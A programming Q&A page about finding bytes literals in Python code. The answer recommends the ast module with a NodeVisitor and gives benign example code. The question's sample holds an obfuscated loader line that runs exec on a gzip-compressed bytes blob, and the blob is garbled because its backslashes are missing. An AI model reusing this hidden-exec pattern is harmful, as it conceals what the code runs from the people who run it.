Find all occurrences of bytestrings in a Python code snippet
Question:
I’m trying to parse Python snippets, some of which contain bytestrings.
For example:
"""
from gzip import decompress as __;_=exec;_(__(b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00'))
x = b"x1fx8bx08"
y = "hello world"
"""
Is there a regex pattern I can use to correctly find those strings?
I have tried implementing a regex query myself, like so:
bytestrings = re.findall(r'b"(.+?)"', text) + re.findall(r"b'(.+?)'", text)
I was expecting to receive an array:
[b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00', b"x1fx8bx08"]
Instead, it returns an empty array.
Answers:
This isn’t a job for regular expressions, but for a Python parser.
import ast
code = """
...
"""
tree = ast.parse(code)
Now you can walk the tree looking for nodes of type ast.Constant whose value attribute has type bytes. Do this by defining a subclass of ast.NodeVisitor and overriding its visit_Constant method. This method is called for each ast.Constant node in the tree, letting you examine its value. Here, we simply append the matching values to a module-level list.
bytes_literals = []

class BytesLiteralCollector(ast.NodeVisitor):
    def visit_Constant(self, node):
        # Keep only constants whose value is a bytes object.
        if isinstance(node.value, bytes):
            bytes_literals.append(node.value)

BytesLiteralCollector().visit(tree)
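As a self-contained sketch of the visitor above, the variant below stores its results on the instance rather than in a module-level list. The attribute name found and the sample snippet are made up for illustration. It assumes Python 3.8 or later, where bytes literals are parsed as ast.Constant nodes (earlier versions used ast.Bytes).

```python
import ast

class BytesLiteralCollector(ast.NodeVisitor):
    """Collects the value of every bytes literal it visits."""

    def __init__(self):
        # Hypothetical attribute name; replaces the module-level list.
        self.found = []

    def visit_Constant(self, node):
        if isinstance(node.value, bytes):
            self.found.append(node.value)

# A raw string, so the backslashes reach the parser untouched.
sample = r'''
x = b"\x1f\x8b\x08"
y = "hello world"
z = "b'looks like bytes'"  # a str, not a bytes literal
# w = b'inside a comment'
'''

collector = BytesLiteralCollector()
collector.visit(ast.parse(sample))
print(collector.found)  # [b'\x1f\x8b\x08']
```

Only the real bytes literal is reported. The text inside the ordinary string and the text inside the comment both look like bytes literals to a pattern match, but the parser never treats them as such.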
The documentation for NodeVisitor is not great. Aside from visit and generic_visit, you can define a method named visit_* where * is the class name of any node type in the abstract grammar presented at the start of the ast documentation. visit calls that method when it exists and falls back to generic_visit otherwise.
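When only one node type matters, a visitor class is optional. The sketch below uses ast.walk instead and also records where each literal sits in the source. The function name find_bytes_literals and the sample are hypothetical. The results are sorted because ast.walk does not promise any particular order.

```python
import ast

def find_bytes_literals(source):
    """Return sorted (line, column, value) tuples for each bytes literal."""
    tree = ast.parse(source)
    return sorted(
        (node.lineno, node.col_offset, node.value)
        for node in ast.walk(tree)
        if isinstance(node, ast.Constant) and isinstance(node.value, bytes)
    )

sample = 'x = b"abc"\ny = "hello world"\nprint(b"def")\n'
for line, col, value in find_bytes_literals(sample):
    print(line, col, value)
```

For this sample the function returns [(1, 4, b'abc'), (3, 6, b'def')]. Line numbers are 1-based and column offsets are 0-based, as in the rest of the ast module.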
You can use print(ast.dump(ast.parse(code), indent=4)) to get a more-or-less readable representation of the tree that your visitor will walk.
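A quick way to try this is to dump a one-line snippet. The sample below is made up for illustration, and the exact layout of the output varies between Python versions, so none is shown here.

```python
import ast

# A raw string, so the escape sequences are interpreted by the parser.
sample = r'x = b"\x1f\x8b\x08"'

# The indent argument of ast.dump requires Python 3.9 or later.
dumped = ast.dump(ast.parse(sample), indent=4)
print(dumped)
```

In the printed tree, the bytes literal shows up as a Constant node in the value field of the Assign node, which is the node that visit_Constant receives.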